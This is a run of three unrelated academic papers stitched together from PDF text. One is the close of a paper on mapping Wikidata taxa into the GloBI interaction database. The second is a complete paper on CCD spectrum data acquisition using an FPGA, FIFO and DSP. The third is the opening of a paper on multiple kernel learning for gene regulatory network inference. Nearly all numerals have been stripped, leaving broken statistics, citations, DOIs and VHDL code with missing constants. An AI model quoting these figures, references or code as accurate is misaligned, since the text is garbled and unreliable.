gbif, eol, if, fishbase or worms identifier and the corresponding wikidata identifier. the globi taxon graph was already in a similarly formatted lookup table. the taxon graphs in globi and wikidata were mapped to each other with a join of the ncbi, itis, gbif, eol, if, fishbase or worms identifiers of the respective lookup tables (fig. ). so, for each external identifier that occurred in both wikidata and globi, the corresponding wikidata identifier inserted in the globi lookup table. for instance, consider wikidata taxon item q (https://www.wikidata.org/wiki/q accessed on march ; panthera leo) points to itis: . with the matching algorithm used, globi now considers wd:q to be linked to all taxon entries that are considered the same as, or synonymous to, itis: . this final joined graph was saved into hdfs as a parquet file and linked entries were appended to globi taxon graph from v . . onward (poelen, c). in addition, the globi ingestion engine was updated to automatically perform the taxon graph matching for future updates. this linkage enabled lookups of diet items of lions by wikidata identifier via https: //www.globalbioticinteractions.org/?interactiontype=eats&sourcetaxon=wd% aq and facilitates future integration of species interaction data with wikidata. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.wikidata.org/wiki/q https://www.globalbioticinteractions.org/?interactiontype=eats&sourcetaxon=wd% aq https://www.globalbioticinteractions.org/?interactiontype=eats&sourcetaxon=wd% aq http://dx.doi.org/ . /peerj-cs. taxon graph overlap and consistency ott, wikidata, and globi taxon graphs maintain links to gbif, if, ncbi and worms identifiers (referred to as external identifiers). the taxon graphs are considered to (partially) overlap if individual taxon ids from different graphs have at least one external identifier in common. in addition, a taxon graph is inconsistent if a taxon id links to multiple external identifiers from the same identifier scheme. similarly, overlapping taxon ids are said to be inconsistent if they link to multiple external identifiers from the same identifier scheme. where overlap is a measure for taxon graph similarity, consistency can be seen as a way to measure the relative quality of (overlapping) taxon graphs. for instance, let’s say that ott: is linked to ncbi: , worms: , and gbif: . in addition, wd:q (https://www.wikidata.org/wiki/q ) points to worms: , gbif: , and ncbi: . this would mean that links of these ott and wd ids overlap and are consistent, because they do not point to different names in same naming schemes (fig. ). however, when considering the globi taxon ‘‘id’’ ‘‘globi:null@procladius sp m_pl_ ’’, multiple links to external ids were found (e.g., ncbi: , ncbi: , ncbi: , ncbi: , ncbi: , ncbi: ). in this case, the globi taxon id is inconsistent. the high number of external ncbi identifiers is due to the ncbi taxonomy containing many ‘‘provisional’’ taxa derived from environmental samples. data access all of the input data sets can be found at: https://doi.org/ . /zenodo. (globi taxon graph), http://files.opentreeoflife.org/ott/ott . /ott . .tgz (open tree of life taxonomy) http://doi.org/ . /zenodo. (wikidata). a selection of intermediary and result datasets are available online (poelen, d; poelen, a). all of the scripts used to make the statements in the results can be found here (https://github.com/bio-guoda/guoda-datasets/tree/master/wikidata) with instructions on how to duplicate the analysis. results after min of processing, globi was linked to wikidata using pre-existing identifier mappings. the wikidata dump was gb of compressed json with – million data items. it took about min for guoda to extract taxa (about . million) and their links in wikidata and then less than one minute to map the wikidata taxon graph to the globi taxon graph. the , wikidata links that were added to globi increased its outgoing name links by . % (poelen, d). eighty-seven percent ( . %) of the external identifiers in wikidata overlap with the external identifiers in ott (fig. ). eighty-six percent ( . %) of the external identifiers in globi overlap with the external identifiers in ott (fig. ). wikidata provided mappings for . % of the external identifiers in globi (fig. ). out of the , external identifiers that occurred only in ott and globi, only were inconsistent (https://github.com/bio-guoda/guoda-datasets/blob/ master/wikidata/inconsistentnameidsglobi_ott.tsv). these links pointed to seven thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.wikidata.org/wiki/q https://doi.org/ . /zenodo. http://files.opentreeoflife.org/ott/ott . /ott . .tgz http://doi.org/ . /zenodo. https://github.com/bio-guoda/guoda-datasets/tree/master/wikidata https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobi_ott.tsv https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobi_ott.tsv http://dx.doi.org/ . /peerj-cs. figure inconsistent graph matching. when overlapping taxon graphs include multiple name strings, the graph is inconsistent. in this example the procladius genus is present in wikidata (red), open tree (textured fill), and globi (blue). the wikidata, ott, and globi taxon graphs overlap on the ncbi and the gbif identifiers (purple and textured fill). the worms identifier overlaps the ott and wikidata taxon graph (red and textured fill). the procladius graph in globi includes ncbi identifiers with a differ- ent name string, procladius (holotanypus), which indicates inconsistent usage. full-size doi: . /peerjcs. /fig- ott ‘‘taxa’’. no inconsistent links were found between wd and globi. out of the , links only found in globi, , were inconsistent (https://github.com/bio-guoda/guoda- datasets/blob/master/wikidata/inconsistentnameidsglobionly.tsv). the ott, wikidata, and globi identifier graphs related to this coverage analysis is a mb compressed tab-separated-values file consisting of about million identifier mapping records (see https://zenodo.org/record/ /files/links-globi-wd-ott.tsv.gz). the resulting wikidata taxon objects were merged into globi’s taxon graph (poelen, d). thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobionly.tsv https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobionly.tsv https://zenodo.org/record/ /files/links-globi-wd-ott.tsv.gz). http://dx.doi.org/ . /peerj-cs. figure identifier overlap between wikidata (wd), ott, and globi. this venn diagram shows the number of overlapping external identifiers that can be found in one of three databases. only , ex- ternal ids can be found in all three. these consisted of , worms links, , ncbi links, , gbif links and , if links. over two million ids are only known to one of the three databases. ott contains more than half of the external ids in wikidata and in globi, but neither contain half of the exter- nal ids in ott. mapping wikidata to globi matched . % of the external ids in globi. full-size doi: . /peerjcs. /fig- in order for a mapping to be considered consistent, there can only be one identifier per resource included in each local graph. thus, after removing the inconsistent identifiers, the external id overlap can be interpreted as an estimate of the number of shared taxon names between two databases (table ). this cannot be interpreted as total taxa in each resource. discussion guoda is a high performance computing resource for biodiversity science that provides scalable solutions for working with large data sets in a collaborative, online environment. the min processing time for gb of compressed json is far faster than any current mapping method used in biodiversity; however, it does benefit from the mapping already completed inside wikidata. for example, the wikidata entry for panthera leo (https://www.wikidata.org/wiki/q ) has links to external databases, not all of them thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.wikidata.org/wiki/q http://dx.doi.org/ . /peerj-cs. table absolute and relative link counts from ott, wd, and globi compared to worms, gbif, index fungorum (if), and ncbi. worms gbif if ncbi combined ott , ( %)* , , ( %) , ( %) , , ( %) , , ( %) wd , ( %) , , ( %) , ( %) , ( %) , , ( %) globi , ( %) , ( %) , ( %) , ( %) , , ( %) notes. *overlap between each resource and ott is set at %. the other percentages give a relative estimate of size and scale and should not be interpreted as overlapping ids. biodiversity-related. this linking may be based on matching name strings. other efforts using name-string-matching to link biodiversity databases take much longer to map resources together. for instance, eol takes more than a day to map the content it receives from providers to a unified classification (j rice, pers. comm., ). similarly, the taxon matching in bionames and linkout took days to complete (r page, pers. comm., ). projects like ott, wikidata, and globi that keep identifier-based taxonomic graphs make it easier to link databases at scale. despite the notoriously poor nature of taxon names as identifiers, they are still commonly used to link biodiversity data. a much-discussed solution has been the use of universal, unique, persistent, resolvable identifiers across the biodiversity data landscape, but the social barrier to a universal identifier system has, thus far, proven insurmountable (nimis, ; hardisty, roberts & the biodiversity informatics community, ). rather than rely on name strings or a universal identifier system, this method uses the graph of identifiers to map taxa across two databases. this identifier-based method has the potential to be faster and easier than name-string matching without some of the social difficulties of a single identifier system. most biodiversity databases and nomenclatural authorities expose their data in idiosyncratic ways that are not suitable for batch processing. if data sources published their taxon identifier graph as a lookup table (as described in this paper) integrating across databases would be much easier (fig. ). now, users have to learn a unique format for every data source. these lookup tables have the advantage of being easy to version and integrate. in addition to fast linking of biodiversity databases, comparison of identifier graphs may be a scalable way to find inconsistencies, especially when multiple biodiversity databases/identifiers are included. by linking globi to ott and wd, inconsistent names or false positive name matches were detected by considering the (lack of) overlap of globi names with ott and wd external identifier schemes. these inconsistencies might be introduced by a dataset or a name resolution method that produces ambiguous results. in addition, inconsistencies can indicate a disputed/outdated name like ‘‘globi:null@senecio pectinatus’’ which maps to gbif: and gbif: . this would be considered an inconsistent mapping and suggests that senecio pectinatus is an outdated name. a related method using a variation of the pagerank algorithm (page et al., ; brin & page, ) to identify the most legitimate taxonomic name to apply to a fossilized specimen (huber & klump, ) gives further legitimacy to this concept. combining the speediness with thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example look up table. this figure is an excerpt from the globi look up table. the provided- taxonid and the providedtaxonname come from the taxon graph external to globi. the resolvedtax- onid and the resolvedtaxonname are the names and identifiers that are already mapped within globi. each row represents a mapping from a taxon in an external source (pluvialis obscura) to an identifier from a source already in globi, which does not mint its own identifiers. full-size doi: . /peerjcs. /fig- the promise of scalability, a near-real-time name consistency check can be implemented to detect inconsistencies across various systems in the biodiversity data-ecosystem introduced by integration bugs, taxonomy updates or differences of interpretation. guoda has been available since and contains data dumps from gbif, eol traitbank, inaturalist, idigbio, and bhl which are all accessible via a jupyter notebook, web services, or apache spark shell on the command line. despite its computing power and successful demonstrations at major conferences, guoda has not been used to its full potential. the barrier of learning new programming and computing paradigms as well as developing an understanding of large dataset work flows seems to be a barrier to many in the biodiversity community. despite this, guoda is being used in several capacities. the effechecka application generates taxonomic checklists using a web interface that allows a user to draw a polygon on a map and returns a deduplicated list of taxa aggregated from observation data held in gbif, inaturalist, etc. the eol freshdata project uses it to enable the detection of new occurrence records given geospatial and taxonomic and data source constraints and notifies interested users via email. several workshops have used it to teach spark programming skills to students at the university of florida. future work on the guoda infrastructure includes training and evaluating neural network models on image data, containerization of the guoda components to allow the system to be run in additional data centers, and refinement of the end-user interface to integrate programming, source code, and publication to make research more reproducible. guoda’s most impactful contribution has likely been the availability of readily formatted biodiversity data and new data sets will continue to be added to the collaboration platform, enabling domain experts and technical experts to answer new questions in the future. the bottlenecks in processing for hadoop file system and apache spark are the number of cpus, amount of memory, and available storage space allocated to the computer cluster. both hdfs and spark are designed to scale horizontally by adding commodity servers (aka thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nodes) to increase the processing power, working memory, and storage space. thus, this problem is immediately solvable. internet bandwidth to transfer the data archives from open tree of life, wikidata, and globi does not scale and is not something that can be addressed solely within our research group. at the moment, it takes longer to download the wikidata resource than it does to run the linking process discussed in this manuscript. socio-technical bottlenecks include resource-limitation and user education. increased usage and operational support is expected to positively impact processing performance by encouraging pro-active bug fixing and infrastructure maintenance. in addition, while the technical complexity of operating and using a compute cluster have been dramatically reduced since the introduction of hadoop in , some re-education may be needed to effectively use these powerful data tools (e.g., jupyter notebooks, hdfs, scala). guoda, and hosted data analytics infrastructure in general, has the potential to drastically improve biodiversity science by making multiple biodiversity databases accessible to scientists for analysis on their laptop or desktop. users still need to have some programming skills, which have now become an essential skill in biodiversity science. conclusions sharing information between biodiversity databases can be difficult because of the amount and heterogeneity of the data and the identifiers. most mappings are done using taxonomic name strings at great expense. we were able to map wikidata to globi in min using identifier graphs and guoda, a high performance computing infrastructure developed through collaboration between diverse players. the mapping increased globi’s outgoing name links by . %. this method of mapping across databases using identifier graphs is faster than comparing name strings and can help find inconsistencies that point to a disputed or outdated name. guoda, and systems like it, have the potential to revolutionize biodiversity science by bringing diverse technically minded people together with high performance computing resources that are accessible from a laptop or desktop. acknowledgements the authors would like to acknowledge support and resources provided by the acis lab. the authors would like to acknowledge josé a.b. fortes for providing infrastructure and creating room for collaboration. the authors would like to thank the two reviewers for their insightful comments that greatly improved the manuscript. the encyclopedia of life and idigbio helped establish an informal yet pragmatic cross-institutional collaboration. additional information and declarations funding funding was provided by david rubenstein and the encyclopedia of life and by idigbio, nsf award . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: nsf award: . competing interests the authors declare there are no competing interests. author contributions • anne e. thessen analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • jorrit h. poelen conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • matthew collins contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper. • jen hammock authored or reviewed drafts of the paper, provided collaborative space and leadership. data availability the following information was supplied regarding data availability: poelen, jorrit h. ( ). global biotic interactions: taxon graph (version . . ) [data set]. zenodo. http://doi.org/ . /zenodo. . wikidata. ( ). wikidata dump - - [data set]. zenodo. http://doi.org/ . /zenodo. poelen, jorrit. ( ). gb in min: data linking across major biodiversity databases: data supplements (version . ) [data set]. zenodo. available at http: //doi.org/ . /zenodo. references bingham hc, doudin m, weatherdon lv, despot-belmonte k, wetzel ft, groom q, lewis e, regan e, appeltans w, güntsch a, mergen p, agosti d, penev l, hoffmann a, saarenmaa h, geller g, kim k, kim h, archambeau as, häuser c, schmeller ds, geijzendorffer i, garcía camacho a, guerra c, robertson t, runnel v, valland n, martin cs. . the biodiversity informatics landscape: elements, connections and opportunities. rio :e doi . /rio. .e . brin s, page l. . the anatomy of a large-scale hypertextual web search engine. computer networks and isdn systems ( – ): – doi . /s - ( ) -x. hardisty a, roberts d, the biodiversity informatics community. . a decadal view of biodiversity informatics: challenges and priorities. bmc ecology : doi . / - - - . hindman b, konwinski a, zaharia m, ghodsi a, josepyh ad, katz r, shenker s, stoica i. . mesos: a platform for fine-grained resource sharing in the data thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://dx.doi.org/ . /rio. .e http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. center. in: proceedings of the th usenix conference on networked systems design and implementation. berkeley: usenix association, – . hortal j, de bello f, diniz-filho jaf, lewinsohn tm, lobo jm, ladle rj. . seven shortfalls that beset large-scale knowledge of biodiversity. annual review of ecology, evolution, and systematics ( ): – doi . /annurev-ecolsys- - . huber r, klump j. . charting taxonomic knowledge through ontologies and rank- ing algorithms. computers & geosciences : – doi . /j.cageo. . . . kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kelley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c, jupyter de- velopment team. . jupyter notebooks—a publishing format for reproducible computational workflows. in: loizides f, schmidt b, eds. positioning and power in academic publishing: players, agents and agendas. amsterdam: ios press, – . nimis pl. . a tale from bioutopia: could a change of nomenclature bring peace to biology’s warring tribes? nature ( ): doi . / . page l, brin s, motwani r, winograd t. . the pagerank citation ranking: bringing order to the web. technical report. palo alto: stanford digital library technologies project. page rdm. . tbmap: a taxonomic perspective on the phylogenetic database treebase. bmc bioinformatics ( ): doi . / - - - . page rdm. . biodiversity informatics: the challenge of linking data and the role of shared identifiers. briefings in bioinformatics ( ): – doi . /bib/bbn . page rdm. . linking ncbi to wikipedia: a wiki-based approach. plos currents :rrn doi . /currents.rrn . page rdm. . bionames: linking taxonomy, texts, and trees. peerj :e doi . /peerj. . parr cs, wilson n, leary p, schulz ks, lans k, walley l, hammock ja, goddard a, rice j, studer m, holmes jtg, corrigan jr rj. . the encyclopedia of life v : providing global access to knowledge about life on earth. biodiversity data journal :e doi . /bdj. .e . poelen j. a. gb in min: data linking across major biodiversity databases: data supplements. version . . zenodo doi . /zenodo. . poelen j. b. global biotic interactions: taxon graph. version . . . zenodo doi . /zenodo. . poelen j. c. global biotic interactions: taxon graph. version . . . zenodo doi . /zenodo. . poelen j. d. global biotic interactions: taxon graph. version . . . zenodo doi . /zenodo. . poelen jh, simons jd, mungall cj. . global biotic interactions: an open infras- tructure to share and analyze species-interaction datasets. ecological informatics : – doi . /j.ecoinf. . . . thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /annurev-ecolsys- - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bib/bbn http://dx.doi.org/ . /currents.rrn http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /bdj. .e http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . /peerj-cs. rees ja, cranston k. . automated assembly of a reference taxonomy for phyloge- netic data synthesis. biodiversity data journal :e doi . /bdj. .e . shvachko k, kuang h, radia s, chansler r. . the hadoop distributed file system. in: msst’ proceedings of the ieee th symposium on mass storage systems and technologie. piscataway: ieee computer society, – . voß j. . wikidata-taxonomy . . . version . . . zenodo doi . /zenodo. . vrandečić d, krötzsch m. . wikidata: a free collaborative knowledgebase. commu- nications of the acm ( ): – doi . / . wikidata. . wikidata dump - - . zenodo. doi . /zenodo. . zaharia m, xin rs, wendell p, das t, armbrust m, dave a, meng x, rosen j, venkataraman s, franklin mj, ghodsi a, gonzalez j, shenker s, stoica i. . apache spark: a unified engine for big data processing. communications of the acm ( ): – doi . / . thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bdj. .e http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. your paper's title starts here: please center a fast optical spectrum data acquisition method based on fpga and dsp liqun xu , gong jiaming . atkins rd little rock, ar, usa, , liqunxu @gmail.com . xian university of posts & telecomm. , gjm@xiyou.edu.cn abstract. this paper presents a fast ccd optical spectrum data acquisition method based on fpga, fifo and dsp. introduces a linear ccd timing sequence control signal generation and high speed adc interface with fifo and dsp in detail, publishes this design key parts fpga logic schematic and vhdl source code, provides a general solution for universal high speed ccd optical spectrum data acquisition and analysis system. keywords: linear ccd, fpga, fifo, dsp . introduction fiber spectrometer is the key parts in portable raman spectrometers, it is composed of linear ccd detector , optical parts (filter, diffraction grating, lens etc) and data acquisition, store and processing circuit part, but how do to fast sample and save this optical spectrum data into pc is a critical issue for the fiber spectrometers. so this paper presents a powerful method of fast ccd data acquisition, introduces the method and key parts implement hardware schematic and fpga vhdl source code in detail. . system design based on fpga and dsp whole system level hardware design digram is showed as figure , in this design, ilx linear ccd is selected as optical spectrum detector, in order to obtain high snr and high resulation in this system, a high performance bit sar adc chip ad is used, also an asynchronized fifo ram has been used as bridge between the adc and dsp, fpga is used to generate variety ccd timing clock and asynchronized fifo control signal. tms vc a dsp is used as a whole system center control unit, because of it’s fast data processing ability,low power consumption and built in usb . port. so by using this dsp chip, the ccd sampling optical spectrum data can be fast transmitted to dsp internal sram and then do raman data analyzing algorithm, also taking advantage of this dsp usb . port, the sampling data can be fast sent to pc. with dsp powerful mcbsp communication port, the dsp chip can easy send the command to fpga and laser control driver. tft color display is a option in future product update. a d c linear ccd detector ccd control signal ccd analogy ccd clock pulse generator circuit latch and fifo tms vc a dsp signal generator adc control data bus d ~d ext int mcbsp serial to parallel fpga and dsp communciation usb . pocket pc mcbsp ext int serial to parallel tft color lcd key scan control ic sda i c bus scl key pads max ep ct c fpga convst busy emif laser control circuit mcu communciation though spi to dsp output signal mcbsp fig . raman spectrometer system digram . linear ccd time sequence signal generation and optical spectrum data aacquisition a. ilx linear ccd time suquence signal generation the ilx is ccd linear image sensor, it’s feature: pixels, µm x µm ( µm pitch), single v power supply, ultra-high sensitivity, built-in sample-and-hold circuit, maximum clock frequency is mhz, its wavength range from ~ nm, it is well fit to raman spectrum data analying wavelength range, when use a nm laser source. figure shows this ccd detector time sequence diagram, figure shows its analog output waveform, so in order to driver ilx ccd , external driver circuit has to provide two time sequence control signal : one is ccd clock signal Φclk , it’s maximum frequency is mhz, tpical working in mhz. another is timing driver signal Φrog. the Φrog pulse period decides the scan a frame pixel time and ccd exposure time, since a frame has pixel + dummy signal = clock pulse, so scaning a frame ccd pixel needs at least clocks signal period, and the true effective clock generated analog signal , which is sensitive optical exposure source, has only pulse. so ccd time sequence signal generation module has to have function as follows: ) gernerates Φrog pulse , Φrog period > x Φclk period; ) generates more than clock pulse Φclk; ) generates clock pulse with duty cycle % Φadc_const, which is corrposed ccd output analog signal and synchronized to start adc convter. the ccd_rog negative pulse enable the ccd output effective and let the ccd exposured piexl convter analog signal output by ccd clk clock driving . so how to create these three control pulse is the design key point. fig ilx linear ccd clock timing diagram fig ccd analog output ccd rog ccd clk adc const a frame ccd scan time sequnce > clock pulse clock pulse fig. key ccd control pulse waveform figure displays this three control pulse waveform, and figure presents their fpga loglic function schematic. in this design, a stable mhz clock source can be obtained though fpga internal pll , divide this mhz clock source into mhz with % duty cycle using a divider, this mhz clock function as whole ccd driving clock source, the ccd and adc time sequence control signal generation module is show in figure . in order to obtain a Φ rog signal , use a divider to get a us width pulse as a rog generator, the Φrog period is controlled by reciving parameter though mcbsp port coming from dsp. clk_in clk clk_div ide_rog inst clk rog adc_start adc_start_ctr inst and inst not inst adc_convst !mhz and inst ccd_rog output adc constoutput ccd clkoutput vcc clk in input fig ccd and adc time sequence control signal generation module diagram in figure , module inst implement the Φrog pulse generation function, module inst implement the ccd clk and adc start pulse signal. the figure shows this signal generation simulation waveforms. inst and inst mode vhdl code is present in follows. the inst vhdl is the same with inst in figure , difference is inst vhdl adds fifo contol function. as figure show the simulation result, the function is exactly well meet the ccd control time seqence reguirment. fig ccd and adc timeing sequence generation waveform b. ccd data sampling and transmit into dsp internal sram how do the ccd sampling data fast transmit to dsp internal sram is secondly key design point. since tms vc a dsp has more rapidly operation speed when core clock freqency works in mhz, and the ccd scan clcok frequnce is mhz, if using the mhz pulse to directly triger the dsp external interrupt source, the high data rate cannot be achieved to read data from the converter. because interrupt latencies prevent the dsp from reacting fast enough and even use a direct memory access (dma) tramit data. since the high data tied up most of i/o port bandwith, the whole dsp working efficiency will drop too much, so an ideal solution is use fifo as buffer bridge, when whole pixel of ccd signal has been sampled and saved to fifo, the bolck data can be read in burst from fifo to dsp sram though dma mode. figure give a whole ccd and fifo control signal fpga schematic, lpm_counter is used only for simulation adc input data. although altera fpga provides rich fifo source, factual using has a lot of trick. the w_req and r_req has to set strictly , usually output signal w_full and r emprty signal are used as a monitor judgment, but facul using r_req as external data start to read is more better than using w_full. from figure , rdempty outpout signal provides a read fifo effective signal, so use r_req as dsp external interrupt trigger signal, in dsp interrupt response routine, read whole data block, when dsp implement read emif, it generates a are signal, which can be utilized as synchronized fifo read data clock signal r_clk; from the fig schematic, adc_startctr mode provides adc start signal, and adc busy output signal is used as fifo write data clock signal , that means ,only when adc finish one conversion, the adc conveter data is valid and the sampling data can be saved to fifo ram, from fig. , fig. , when r_req is ready, adc_out data is not effective, need wait for r_clk clock, so using r_req as dsp interrupt source, in dsp interrupt service routine, discard first data and keep reading data using dma counter. so from d[ ] to d[ ] total sampling data can be read to dsp sram. fig. shows the function implement simulation result of figure , from this waveform, the w_clk set in ns and r_clk is set ns, that means let r_clk is times fast than w_clk , and result show read data bolck is fast times than write data block. it sucessfully soloves the difficulity of adc and dsp asynchronized data read and write speed. vcc adc_in[ .. ] input vcc r_clk input vcc clk_in input ccd_clk output w_reqoutput r_reqoutput ccd_rogoutput adc_constoutput wr_f ulloutput adc_out[ .. ]output w_clkoutput rdemptyoutput adc_in_sim[ .. ]output rdusedw[ .. ]output wrusedw[ .. ]output clk rog adc_start w_req r_req adc_start_ctr inst clk_in clk clk_div ide_rog inst and inst not inst and inst and inst and inst up counter clock cnt_en a c lr q[ .. ] lpm_counter inst bits x words data[ .. ] w rreq w rclk rdreq rdclk aclr w rf ull w rusedw [ .. ] q[ .. ] rdempty rdusedw [ .. ] dcfifo inst adc_convst mhz fig. ccd and fifo control signal schematic fig. ccd and fifo control signal simulatiom waveform fig. data read initial side fig. . data read end side c. fpga control mode vhdl source code ------- ccd rog signal generation vhdl library ieee; use ieee.std_logic_ .all; use ieee.numeric_std.all; entity clk_divide_rog is port(clk_in: in std_logic; clk : out std_logic); end entity clk_divide_rog; architecture behave of clk_divide_rog is signal clk c: std_logic; signal div cnt: unsigned( downto ); begin process(clk_in) begin if(clk_in'event and clk_in=' ') then div cnt<=div cnt+ ; end if; if(div cnt<=" ") then clk c<=' '; elsif(div cnt> " " and div cnt< " ") then -- more than clock clk c<=' '; elsif(div cnt >= " ") then div cnt<=" "; end if; clk <= clk c ; end process; end architecture behave; . ccd, adc , fpga and dsp hardware interface figure shows the ccd, adc, fpga and dsp important wires connection associated with system sampling data transmit. the adc adc chip is selected, it’s an bit high performance sar adc with snr db, msps, and its power supply only has . v and differential input range is ± . v, also it’s power consumption has only mw, this extraordinary fetures is espcially well suitable for portable and handheld raman optical anaylis instrument. in this design set adc mode in bit parallel, and sampling mode set in normal . msps. tms vc a has external memory interface(emif) with sarm and sdram, and six dma controllers, it’s external memory space is divided into spaces by ce ~ce , in this design, ce is used to select momory space from address x , to xc , ; so use x , to x x , total byte external memory space as fifo source address, and assign internal sram x , to x as dma destination memory space. ccd_clk ccd_rog adc_busy adc_convst adc_out[ .. ] r clk dsp_ext_int adc_in[ .. ] , , ad d[ .. ] int are ce tms vc a analog signal opa fpga emif dsp vout ccd_clkccd_rog ccd dectector vi+ adc_busy cnvst adc_d[ .. ] mode mode warp normal ad a d c v c c g n d a or gate fig. ccd, adc , fpga and dsp interface fig optical specturm sampling dispaly figure shows a nm laser source optical spectrum waveform, this waveform indicates that the whole system data sampling is success and the optical spectrum data can be fast transmitted to pocket pc though usb . . . conclusions since fpga is based on sram filed programmable arrary, so it can be composed of different size and depth of fifo ram. by using fpga, variety ccd timing sequnce control signal can be flexibly creatived, for different clock frequency ccd, just change the correspond conversion speed adc chip, change fifo reading and writing clock frequency, the adc sampling data can be fast transmitted to dsp internal sram, meanwhile, dsp can implement real time algorithm and then transmits data to pc through it’s usb port. therfore this design provides a comprehensive optical spectrum data acquisition method. reference [ ] using ti fifo to interface high- speed data converters with ti tms dsps robert finger, ti application report sdma june. . [ ] designing with ti sn v x fifo programmable flags gary khazan and clayton gibbs may . [ ] altera cyclone fpga family datasheet, altera corpation , may, . [ ] tms vc / / / dsp direct memory access (dma) controller reference guide literature number spru e , jan. ti. [ ] sony ilx datasheet. [ ] ad datasheet analog device inc. . [ ] vhdl hardware description langue and digital logic circuit design, hou baihen, gu xin, . mkl-grni: a parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks mkl-grni: a parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks nisar wani and khalid raza govt. degree college baramulla, jammu & kashmir, india department of computer science, jamia millia islamia, new delhi, india abstract high throughput multi-omics data generation coupled with heterogeneous genomic data fusion are defining new ways to build computational inference models. these models are scalable and can support very large genome sizes with the added advantage of exploiting additional biological knowledge from the integration framework. however, the limitation with such an arrangement is the huge computational cost involved when learning from very large datasets in a sequential execution environment. to overcome this issue, we present a multiple kernel learning (mkl) based gene regulatory network (grn) inference approach wherein multiple heterogeneous datasets are fused using mkl paradigm. we formulate the grn learning problem as a supervised classification problem, whereby genes regulated by a specific transcription factor are separated from other non-regulated genes. a parallel execution architecture is devised to learn a large scale grn by decomposing the initial classification problem into a number of subproblems that run as multiple processes on a multi-processor machine. we evaluate the approach in terms of increased speedup and inference potential using genomic data from escherichia coli, saccharomyces cerevisiae and homo sapiens. the results thus obtained demonstrate that the proposed method exhibits better classification accuracy and enhanced speedup compared to other state-of-the-art methods while learning large scale grns from multiple and heterogeneous datasets. subjects bioinformatics, computational biology, data mining and machine learning keywords gene regulatory networks, grn inference, large-scale grn, systems biology, network biology introduction the problem of understanding gene interactions and their influence through network inference and analysis is of great significance in systems biology (albert, ). the aim of this inference process is to establish relationships between genes and construct a network topology based on the evidence provided by different data types. among various network inference studies, gene regulatory network inference (grni) has remained of particular interest to researchers with extensive scientific literature generated in this domain. gene regulatory networks (grns) are biological networks where genes serve as nodes and the edges connecting them serve as regulatory relations (lee et al., ; raza & alam, ). standard methods for grn inference such as relnet how to cite this article wani n, raza k. . mkl-grni: a parallel multiple kernel learning approach for supervised inference of large- scale gene regulatory networks. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted december published january corresponding author khalid raza, kraza@jmi.ac.in academic editor othman soufan additional information and declarations can be found on page doi . /peerj-cs. copyright wani and raza distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kraza@�jmi.�ac.�in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (butte & kohane, ), aracne (margolin et al., ), clr (faith et al., ), sirene (mordelet & vert, ) and genie (huynh-thu et al., ) mostly use transcriptomic data for grn inference. among these methods, our approach is modeled along the same principle as sirene. sirene is a general method to infer unknown regulatory relationships between known transcription factors (tfs) and all the genes of an organism. it uses a vector of gene expression data and a list of known regulatory relationships between known tfs and their target genes. however, integration of this data with other genomic data types such as protein–protein interaction (ppi), methylation expression, sequence similarity and phylogenetic profiles has drastically improved grn inference (hecker et al., ). a comprehensive list of state-of-the-art data integration techniques for grn inference has been reviewed in (wani & raza, a). in this article, we aim to integrate gene expression, methyl expression and tf-dna interaction data using advanced multiple kernel learning (mkl) library provided by shogun machine learning toolbox (sonnenburg et al., ) and design an algorithm to infer gene regulatory networks (grns). besides, we also integrate ppi data and other data such as gene ontology information as source of prior knowledge to enhance the accuracy of network inference. the problem of network inference is modeled as a binary classification problem whereby a gene being regulated by a given tf is treated as a positive label and negative otherwise. to infer a large-scale network, the 